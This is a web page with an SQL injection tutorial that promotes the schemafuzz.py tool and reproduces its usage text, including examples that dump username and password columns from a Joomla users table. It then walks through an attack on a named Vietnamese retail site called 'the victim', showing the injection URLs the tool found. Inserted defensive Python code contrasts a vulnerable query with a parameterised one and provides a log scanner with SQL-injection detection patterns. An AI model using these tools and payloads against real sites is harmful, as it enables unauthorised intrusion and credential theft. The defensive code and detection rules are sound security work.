How to SQL Injection
SQL Injection Tutorial by Marezzi (MySQL)
In this tutorial I will describe how SQL injection works and how to use it to get some useful information.
First of all: What is SQL injection?
It is one of the most common vulnerabilities in web applications today. It allows an attacker to inject database queries through the URL and gain access to confidential information, among other things (in short).
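The sentence above states the mechanism; the following added example (mine, not code from Marezzi's tutorial) shows it running against a constructed in-memory database so that the vulnerable query can be placed beside the fixed one. SQLite stands in for MySQL so that it runs offline without a server, and the `news` and `users` tables and their rows are made up for the demonstration. The "news.php?id=" pattern mirrors the URLs used later on this page.

```python
import sqlite3


def make_db():
    # Constructed sample schema and data; nothing here comes from a real site.
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE news  (id INTEGER, title TEXT, body TEXT);
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO news  VALUES (4, 'Product update', 'New release available');
        INSERT INTO users VALUES (1, 'admin', 'constructed-secret');
        """
    )
    return conn


def fetch_news_vulnerable(conn, news_id):
    # Deliberately vulnerable: the raw request parameter is pasted into the SQL
    # text, so "-1 UNION SELECT ..." becomes part of the statement the database
    # sees. This is the shape of bug the tutorial's --findcol / --dump modes rely on.
    sql = "SELECT title, body FROM news WHERE id = " + news_id
    return conn.execute(sql).fetchall()


def vulnerable_query_error(conn, news_id):
    # Returns the database error text the vulnerable handler would leak if it
    # echoed exceptions to the page (the basis of "error based" injection), or
    # None when the statement ran. A UNION whose column count does not match
    # the original SELECT fails exactly this way.
    try:
        fetch_news_vulnerable(conn, news_id)
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


def fetch_news_safe(conn, news_id):
    # Hardened form: validate that the id is numeric (it is meant to be an
    # integer), then bind it as a parameter so it is never parsed as SQL text.
    try:
        value = int(news_id)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT title, body FROM news WHERE id = ?", (value,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    attack = "-1 UNION SELECT username, password FROM users"
    print("vulnerable:", fetch_news_vulnerable(db, attack))
    print("safe:      ", fetch_news_safe(db, attack))
```

The vulnerable function returns the `users` row for the injected input because the attacker-controlled text changed the statement; the safe function returns nothing because `int()` rejects the string and, even if it had not, the bound parameter could only ever be compared as a value. The error helper shows why column counting matters: a UNION with the wrong number of columns fails, and a server that prints the exception tells the attacker so.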
1. SQL Injection (classic or error based or whatever you call it)
2. Blind SQL Injection (the harder part)
So let’s start with some action
Schemafuzz.py
You can download the Schemafuzz.py script here and then run it with Python.
The schemafuzz.py script is written in Python.
Its commands are as follows:
Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: --dbs Shows all databases user has access too. MySQL v5+
Define: --schema Enumerate Information_schema Database. MySQL v5+
Define: --full Enumerates all databases information_schema table MySQL v5+
Define: --dump Extract information from a Database, Table and Column. MySQL v4+
Define: --fuzz Fuzz Tables and Columns. MySQL v4+
Define: --findcol Finds Columns length of a SQLi MySQL v4+
Define: --info Gets MySQL server configuration only. MySQL v4+
Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."
Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump mode.
Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D catalog -T orders -r 200
Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D joomla -T jos_users -C username,password
Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -end "/*" -o sitelog.txt
Ex: ./schemafuzz.py --findcol -u "www.site.com/news.php?id=22"
nortonvietnam.com
The victim this time is nortonvietnam.com, which at a glance appears to be a Vietnamese website selling Norton Antivirus products.
http://nortonvietnam.com/index.php?mod=newscat&id=4
The results of the investigation using the schemafuzz.py program are as follows:
./schemafuzz.py --findcol -u "nortonvietnam.com/index.php?mod=newscat&id=4"
[+] URL: http://nortonvietnam.com/index.php?mod=newscat&id=4--
[+] Evasion Used: "+" "--"
[+] 12:08:13
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,
[+] Column Length is: 15
[+] Found null column at column #: 0
[+] SQLi URL: http://nortonvietnam.com/index.php?mod=newscat&id=4+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14--
[+] darkc0de URL: http://nortonvietnam.com/index.php?mod=newscat&id=4+AND+1=2+UNION+SELECT+0,1,2,3,darkc0de,5,6,7,8,9,10,11,12,13,14
[-] Done!
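The output above shows what the column-count probe looks like on the wire: a "--" terminator appended to the id, then "AND 1=2 UNION SELECT 0,1,2,..." with "+" standing in for spaces (the "Evasion Used" line). The following added example (mine, not part of the tutorial or of schemafuzz.py) is a small scanner a site owner could run over web server access logs to flag those request shapes after URL-decoding them. The log lines, timestamps and IP addresses in it are constructed, and the field layout assumes the common Apache/nginx combined format.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log sample modelled on the request sequence shown on this
# page (a normal fetch, the "--" check, then the UNION column probe). Not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:12:08:10 +0000] "GET /index.php?mod=newscat&id=4 HTTP/1.1" 200 5120
203.0.113.5 - - [01/Jan/2024:12:08:13 +0000] "GET /index.php?mod=newscat&id=4-- HTTP/1.1" 200 5120
203.0.113.5 - - [01/Jan/2024:12:08:14 +0000] "GET /index.php?mod=newscat&id=4+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14-- HTTP/1.1" 200 4870
198.51.100.9 - - [01/Jan/2024:12:09:01 +0000] "GET /index.php?mod=newscat&id=7 HTTP/1.1" 200 5001
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is applied to the URL-decoded query string, so "+" and %XX
# encodings do not hide the keywords.
RULES = [
    ("union-select", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S)),
    ("boolean-condition", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("comment-terminator", re.compile(r"(--|/\*|#)\s*$")),
    # five or more comma-separated numbers in a row is the column-count probe
    ("column-count-probe", re.compile(r"(\d+\s*,\s*){5,}\d+")),
]


def decode_query(target):
    # Take only the query part of the request target and undo URL encoding,
    # turning "+" back into spaces as the server's parser would.
    return unquote_plus(urlsplit(target).query)


def classify(line):
    # Parse one log line; return None for lines that are not requests.
    m = REQUEST_RE.match(line)
    if not m:
        return None
    decoded = decode_query(m.group("target"))
    hits = [name for name, rx in RULES if rx.search(decoded)]
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "status": int(m.group("status")),
        "decoded": decoded,
        "hits": hits,
    }


def scan(log_text):
    # Return only the parsed records that matched at least one rule.
    records = (classify(line) for line in log_text.splitlines())
    return [r for r in records if r and r["hits"]]


def count_by_source(findings):
    # Per-client tally: repeated hits from one address are the signal that
    # distinguishes automated enumeration from a stray odd request.
    return dict(Counter(r["ip"] for r in findings))


if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["ts"], rec["ip"], rec["hits"], rec["decoded"])
    print(count_by_source(scan(SAMPLE_LOG)))
```

Two points the decoded view makes obvious: the probe still returned HTTP 200, so status codes alone will not reveal it, and the requests share a source and arrive seconds apart, which is why the per-client count is worth more than any single match. The fix remains the parameterised query; this scanner only tells you that someone is looking.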